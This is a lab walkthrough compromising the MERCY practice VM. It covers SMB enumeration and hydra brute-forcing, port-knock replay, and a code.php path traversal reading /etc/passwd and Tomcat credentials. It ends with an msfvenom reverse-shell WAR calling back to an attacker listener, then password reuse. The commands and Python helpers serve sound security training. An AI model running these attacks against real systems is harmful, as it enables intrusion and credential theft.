MERCY target machine
For personal practice only
Target information
下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download
1. Host discovery
![](https://upload-images.jianshu.io/upload_images/4664072-72eef6505e5f75b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-22a00820380cbc99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
PORT     STATE    SERVICE      VERSION
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   filtered http
110/tcp  open     pop3?
139/tcp  open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap         Dovecot imapd
445/tcp  open     netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imap     Dovecot imapd
995/tcp  open     ssl/pop3s?
8080/tcp open     http         Apache Tomcat/Coyote JSP engine 1.1
![](https://upload-images.jianshu.io/upload_images/4664072-1add98215727180c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1135a3ee23bae3e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 8080 serves the Tomcat default page; /manager/ asks for credentials and cannot be logged into yet. Note that 22 and 80 are reported filtered, not closed: a firewall is dropping them.
![](https://upload-images.jianshu.io/upload_images/4664072-be9cd4b23f069164.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-21f0058a5dc94020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-59590405b2a507ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-571f1969ac8eb670.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Vulnerability discovery and exploitation
1. Attacking Samba
Enumerate usernames through the Samba service:
enum4linux -U 192.168.174.130
![](https://upload-images.jianshu.io/upload_images/4664072-519a76f3f081df99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2a3bf522b80364a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Usernames found: qiu and pleadformercy
Try mounting the share remotely (CIFS shares are written as //host/share, not host:/share):
mkdir /mnt/file
mount -t cifs //192.168.174.130/qiu /mnt/file
![](https://upload-images.jianshu.io/upload_images/4664072-dd96ef8a271f7db8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Brute-force SMB with the enumerated usernames (1.txt) and a password list (2.txt):
hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139
![](https://upload-images.jianshu.io/upload_images/4664072-9ef5d1f1112661c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Log in to the share with the recovered credentials:
smbclient //192.168.174.130/qiu -U qiu
![](https://upload-images.jianshu.io/upload_images/4664072-ebc1a77d336a4752.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2135d092a6b287bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bcbd2b3e837e2434.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The share contains the port-knocking daemon's configuration: each knock sequence runs a command that opens a firewall port. Replay the sequences with nmap (a single-port probe sends the SYN the daemon listens for; the ports must be hit in order, within the configured timeout).
#!/bin/bash
# First sequence from the configuration (opens port 80)
for PORT in 159 27391 4; do
    nmap -Pn 192.168.174.130 -p $PORT
done
#!/bin/bash
# Second sequence from the configuration
for PORT in 17301 28504 9999; do
    nmap -Pn 192.168.174.130 -p $PORT
done
![](https://upload-images.jianshu.io/upload_images/4664072-c2635c058b63596b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a54aba8f13d65feb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
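The two loops above replay the knock sequences by hand. As an added example (my code, not from the original walkthrough), the Python below parses the sequences out of a knockd.conf, replays them as TCP SYNs and then checks whether the target port actually opened. The knockd.conf sample is constructed: the two sequences are the ones recovered from the qiu share, but the section names, timeouts and iptables commands, including the assumption that the second sequence opens port 22, are mine; the walkthrough only confirms that the first one opens port 80.

```python
import re
import socket
import sys
import time

# Constructed knockd.conf.  The two sequences are the ones from the walkthrough;
# section names, seq_timeout values and the iptables commands are assumptions
# (the walkthrough only confirms that the first sequence opens port 80).
SAMPLE_KNOCKD_CONF = """
[options]
    UseSyslog

[openHTTP]
    sequence    = 159,27391,4
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[openSSH]
    sequence    = 17301,28504,9999
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

_SECTION = re.compile(r"^\s*\[([^\]]+)\]\s*$")
_KEYVAL = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
_DPORT = re.compile(r"--dport\s+(\d+)")


def parse_knockd_conf(text):
    """Map each knock section to its sequence, the port its command opens, and timeout.

    [options] is skipped.  Sequence entries may carry a protocol suffix (159:tcp);
    it is dropped because this helper only sends TCP SYNs.  Sections without a
    'sequence' line are ignored."""
    rules, current = {}, None
    for line in text.splitlines():
        m = _SECTION.match(line)
        if m:
            current = m.group(1)
            if current.lower() != "options":
                rules[current] = {"sequence": [], "dport": None, "timeout": 5}
            continue
        m = _KEYVAL.match(line)
        if not m or current is None or current.lower() == "options":
            continue
        key, val = m.group(1).lower(), m.group(2)
        if key == "sequence":
            rules[current]["sequence"] = [int(p.split(":")[0]) for p in val.split(",")]
        elif key == "seq_timeout":
            rules[current]["timeout"] = int(val)
        elif key == "command":
            d = _DPORT.search(val)
            if d:
                rules[current]["dport"] = int(d.group(1))
    return {k: v for k, v in rules.items() if v["sequence"]}


def knock(host, sequence, delay=0.3):
    """Send one TCP SYN per port, in order.  A connect() attempt emits the SYN even
    when the port is closed; knockd sniffs the SYN, so the RST that comes back is
    irrelevant.  Keep the whole sequence inside seq_timeout."""
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1.0)
        try:
            s.connect((host, port))
        except OSError:
            pass
        finally:
            s.close()
        time.sleep(delay)


def port_open(host, port, timeout=2.0):
    """True when a full TCP handshake completes, i.e. the firewall rule is in place."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def open_service(host, conf_text, section):
    """Replay one section's sequence; return (open before, open after) for its --dport."""
    rule = parse_knockd_conf(conf_text)[section]
    if rule["dport"] is None:
        raise ValueError("%s has no --dport in its command; cannot verify" % section)
    before = port_open(host, rule["dport"])
    knock(host, rule["sequence"])
    time.sleep(1.0)  # give knockd a moment to run the iptables command
    return before, port_open(host, rule["dport"])


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.174.130"
    section = sys.argv[2] if len(sys.argv) > 2 else "openHTTP"
    print(parse_knockd_conf(SAMPLE_KNOCKD_CONF)[section])
    print("port open before/after knock:", open_service(target, SAMPLE_KNOCKD_CONF, section))
```

Run it as `python3 knock.py 192.168.174.130 openHTTP`. If the port stays closed after the knock, the usual causes are sending the sequence too slowly for seq_timeout, or a source address that differs from the one knockd substitutes into %IP% (for example when the knock goes through NAT).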
Port 80 is now open.
![](https://upload-images.jianshu.io/upload_images/4664072-c09e977d3a2c7ffa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-528044d7d91dfefa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ad7c922b7bcc0596.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fa30c979a30f9b06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8521643f4c7cbfa7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2dee2367f5b28383.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-96a0b397a38647c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-126f5bade49c0fad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5aafbff02964aa97.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The file parameter of code.php is vulnerable to path traversal; the PoC is:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd
![](https://upload-images.jianshu.io/upload_images/4664072-463d2eff58182145.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
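To make the PoC above concrete, here is an added example (my code, not from the original page) that shows why the file= value reaches /etc/passwd and what check would have stopped it. The document root and the directory holding code.php are assumptions; the traversal string is the walkthrough's PoC.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

WEB_ROOT = "/var/www/html"                   # assumed document root
SCRIPT_DIR = WEB_ROOT + "/nomercy/windows"   # assumed directory holding code.php
POC = "http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd"


def file_param(url):
    """Pull the raw file= value out of a PoC URL."""
    return parse_qs(urlsplit(url).query)["file"][0]


def vulnerable_resolve(user_path, base=SCRIPT_DIR):
    """Roughly what include($_GET['file']) does: join and let the kernel walk '..'.
    Six '..' from a five-deep directory is more than enough; extra '..' at / are
    harmless, which is why PoCs over-shoot with a long traversal."""
    return posixpath.normpath(posixpath.join(base, user_path))


def hardened_resolve(user_path, base=SCRIPT_DIR):
    """The check code.php lacks: refuse absolute paths and NUL bytes, then require
    the normalised path to stay under base.  (On a real filesystem use
    os.path.realpath so a symlink cannot point back out of base.)"""
    if "\x00" in user_path or user_path.startswith("/"):
        raise ValueError("rejected: absolute path or NUL byte")
    resolved = posixpath.normpath(posixpath.join(base, user_path))
    if resolved != base and not resolved.startswith(base + "/"):
        raise ValueError("rejected: %r escapes %s" % (user_path, base))
    return resolved


def traversal_url(host, depth=6, target="etc/passwd", script="/nomercy//windows/code.php"):
    """Build the same shape of PoC for another file, e.g. etc/tomcat7/tomcat-users.xml."""
    return "http://%s%s?file=%s%s" % (host, script, "../" * depth, target)


if __name__ == "__main__":
    p = file_param(POC)
    print("vulnerable ->", vulnerable_resolve(p))
    try:
        hardened_resolve(p)
    except ValueError as e:
        print("hardened  ->", e)
    print(traversal_url("192.168.174.130", target="etc/tomcat7/tomcat-users.xml"))
```

The prefix check on the normalised path (rather than a blacklist of "../") is what matters: encoded variants such as %2e%2e%2f are decoded by the web server before they reach the script, so filtering the literal string never holds up.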
For the Tomcat instance on port 8080, the user configuration lives in /etc/tomcat7/tomcat-users.xml, which the same traversal can read:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
![](https://upload-images.jianshu.io/upload_images/4664072-0b304484d2d6399f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Credentials obtained:
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
![](https://upload-images.jianshu.io/upload_images/4664072-c1217f284c911c2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
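What an account can do with those credentials depends on its roles, and that decides how the WAR in the next step gets deployed. As an added example (my code, not from the original page), the Python below parses a tomcat-users.xml as recovered through the traversal and reports which Manager endpoints each account can use. The XML sample is constructed from the two user lines above; the surrounding tomcat-users element is assumed.

```python
import xml.etree.ElementTree as ET

# Constructed from the two <user> lines the walkthrough recovered; the wrapper
# element is assumed.  Tomcat 8+ adds xmlns="http://tomcat.apache.org/xml",
# which the parser below tolerates.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="utf-8"?>
<tomcat-users>
  <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
  <user username="fluffy" password="freakishfluffybunny" roles="none"/>
</tomcat-users>
"""

# What each built-in role unlocks (Tomcat 7 and later split the old 'manager' role).
ROLE_CAPS = {
    "manager-gui": "HTML manager (/manager/html): upload and deploy a WAR from the browser",
    "manager-script": "text API (/manager/text): scripted deploy, e.g. curl -T shell.war",
    "manager-jmx": "JMX proxy (/manager/jmxproxy)",
    "manager-status": "read-only /manager/status",
    "admin-gui": "Host Manager UI (/host-manager/html)",
    "admin-script": "Host Manager text API (/host-manager/text)",
}
DEPLOY_ROLES = ("manager-gui", "manager-script")


def _local(tag):
    """Strip a namespace prefix like {http://tomcat.apache.org/xml}user."""
    return tag.rsplit("}", 1)[-1]


def parse_tomcat_users(text):
    """Return a list of {username, password, roles} from tomcat-users.xml.
    'roles' is kept verbatim: a value such as "none" is just a role name that
    maps to nothing, not a special keyword."""
    users = []
    for el in ET.fromstring(text).iter():
        if _local(el.tag) != "user":
            continue
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]
        users.append({
            "username": el.get("username") or el.get("name"),
            "password": el.get("password"),   # a digest instead of cleartext if a CredentialHandler is configured
            "roles": roles,
        })
    return users


def deploy_routes(user):
    """Which Manager endpoints this account can use to push a WAR."""
    return [ROLE_CAPS[r] for r in user["roles"] if r in DEPLOY_ROLES]


def report(text):
    """One line per account: credentials and the deploy route(s) they unlock."""
    out = []
    for u in parse_tomcat_users(text):
        routes = deploy_routes(u)
        out.append("%s:%s -> %s" % (u["username"], u["password"],
                                    "; ".join(routes) if routes else "no WAR deploy route"))
    return out


if __name__ == "__main__":
    for line in report(SAMPLE_TOMCAT_USERS):
        print(line)
```

For this target the first account holds manager-gui but not manager-script, so the WAR has to go in through the upload form at /manager/html; a scripted `curl -u user:pass -T shell.war 'http://192.168.174.130:8080/manager/text/deploy?path=/shell1'` would be refused with 403 because /manager/text requires manager-script. The fluffy account has no Manager role at all, which is why its value is as a password to try elsewhere rather than on Tomcat.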
Use msfvenom to generate a reverse-shell WAR (start a listener on 192.168.174.128:4444 before the JSP is requested):
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war
![](https://upload-images.jianshu.io/upload_images/4664072-3ab2d450bf3dce70.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f524c238eb330001.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
List the WAR's contents with 7z to learn the JSP's randomly generated name:
7z l shell1.war
![](https://upload-images.jianshu.io/upload_images/4664072-6bf05394b54908b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The generated JSP is wviikccgyjggh.jsp.
After deploying the WAR through the Manager, request http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp to trigger the payload.
![](https://upload-images.jianshu.io/upload_images/4664072-ecc3b64a2be7095a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Upgrade the dumb shell to a tty:
python -c 'import pty;pty.spawn("/bin/bash")'
Local information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-d788753bdf57c527.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Switch to the fluffy account with the password taken from tomcat-users.xml (the same credentials are reused for the system account):
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
![](https://upload-images.jianshu.io/upload_images/4664072-9c195ce47cbabd42.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)